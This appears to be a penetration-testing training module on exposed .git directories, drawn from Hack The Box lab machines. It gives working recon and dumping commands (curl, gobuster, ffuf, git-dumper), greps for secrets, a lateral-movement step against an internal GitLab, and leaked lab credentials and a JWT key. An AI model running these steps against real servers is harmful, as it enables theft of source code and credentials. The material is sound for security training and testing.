Back to All Modules

Git Repository Exposure

#Overview

Exposed .git directories on web servers allow attackers to reconstruct the full source code of a web application, including commit history, configuration files, and hardcoded credentials. This technique is effective against development servers where version control directories were left in the web root, providing complete insight into application logic, authentication mechanisms, and potential secrets committed to the repository over time.

#Prerequisites

  • HTTP access to a web server with an exposed .git directory
  • git-dumper or similar tool
  • git CLI for commit history analysis

#Detection & Enumeration

#Identifying Exposed .git

# Direct access test
curl -s http://target.htb/.git/HEAD
# ref: refs/heads/master -- confirms .git is accessible

# Directory listing test
curl -s http://target.htb/.git/config

# Gobuster scan for .git
gobuster dir -w /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt \
  -u https://source.cereal.htb -k -t 50
# /uploads (Status: 200)
# /.git (Status: 200)      <-- key finding

# Check for .git in subdomains using ffuf
ffuf -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt:FUZZ \
  -u http://target.htb/ -H 'Host: FUZZ.target.htb' -fs <size>
BASH

#Verifying Accessibility

# Check if directory listing is enabled
curl -s http://target.htb/.git/ | head -20

# Check individual files
curl -s http://target.htb/.git/config
# [remote "origin"]
#   url = https://github.com/internal/private-repo.git
BASH

#Exploitation / Execution

#Using git-dumper to Reconstruct Repository

# Clone git-dumper
git clone https://github.com/arthaud/git-dumper
cd git-dumper
pip install -r requirements.txt

# Dump the repository
python git_dumper.py https://source.cereal.htb/ ./src
cd src
# Repository fully reconstructed locally
BASH

#Commit History Analysis

# View all commits with full diffs
git log -p

# Search for sensitive keywords in commit diffs
git log -p | grep -iE "password|secret|key|token|credential"
# Intentions HTB: discovered Greg's password Gr3g1sTh3B3stDev3l0per!1998!

# Look at a specific suspicious commit
git show <commit_hash>

# Identify commits that remove secrets (security fixes)
git log -p --diff-filter=M | grep -B5 -A5 "redacted\|****\|REMOVED"
# Cereal HTB: found JWT signing key "secretlhfIH&FY*#oysuflkhskjfhefesf" in removed commit
BASH

#Source Code Review

# Find hardcoded keys in source
grep -r "secret\|password\|api_key\|token\|JWT_SECRET" --include="*.js" --include="*.py" .

# Find database credentials in config files
grep -r "mysql\|postgres\|connectionString\|DB_" --include="*.json" --include="*.yml" .

# Identify authentication bypass opportunities
grep -r "Authorize\|Authenticate\|login\|register" --include="*.cs" --include="*.py" .
BASH

#.git/config Analysis

# Check for internal repository URLs
cat .git/config
# [remote "origin"]
#   url = git@internal.gitlab.local:project/repo.git

# Use discovered URLs for lateral movement
curl -s http://internal.gitlab.local/api/v4/projects
BASH

#Dealing with Restricted Git Access

# If git commands fail with "dubious ownership" errors:
git log -p
# fatal: detected dubious ownership in repository at '/var/www/html/app'

# Override HOME to bypass write permission restrictions (Intentions HTB)
HOME=/tmp git config --global --add safe.directory /var/www/html/app
HOME=/tmp git log -p
BASH

#Common Pitfalls

  • git-dumper fails on incomplete .git directories -- try manual file-by-file download
  • git log fails with "dubious ownership" -- use HOME= override or git config --global safe.directory
  • Commit history may be truncated -- .git may be a deployment snapshot, not full history
  • Binary files in commits may not diff cleanly -- look at commit messages for context

#OPSEC Considerations

  • Downloading an entire .git repository generates a distinct traffic pattern (many small requests)
  • .git/config may contain internal hostnames that reveal infrastructure details
  • Commit timestamps expose the development timeline of the target

#Post-Exploitation Value

  • Complete source code for vulnerability identification (auth bypass, SQL queries, hardcoded secrets)
  • Hardcoded API keys, JWT signing secrets, encryption keys in commit history
  • Database credentials in configuration files (application.properties, .env, web.config)
  • Internal infrastructure URLs from .git/config (GitLab, Jenkins, internal APIs)
  • Developer credentials that may be reused across services

#Cross-References

#Tool References

ToolLink
git-dumperhttps://github.com/arthaud/git-dumper
GitToolshttps://github.com/internetwache/GitTools
GitHackerhttps://github.com/WangYihang/GitHacker
truffleHoghttps://github.com/trufflesecurity/trufflehog

#Source Machines

  • Intentions (Hard, Linux) -- Git history reveals greg's SSH password
  • Cereal (Hard, Windows) -- Git commit leak of JWT signing key, source code review for deserialization
  • Editorial (Easy, Linux) -- Git history reveals prod credentials and CVE-2022-24439 exploitation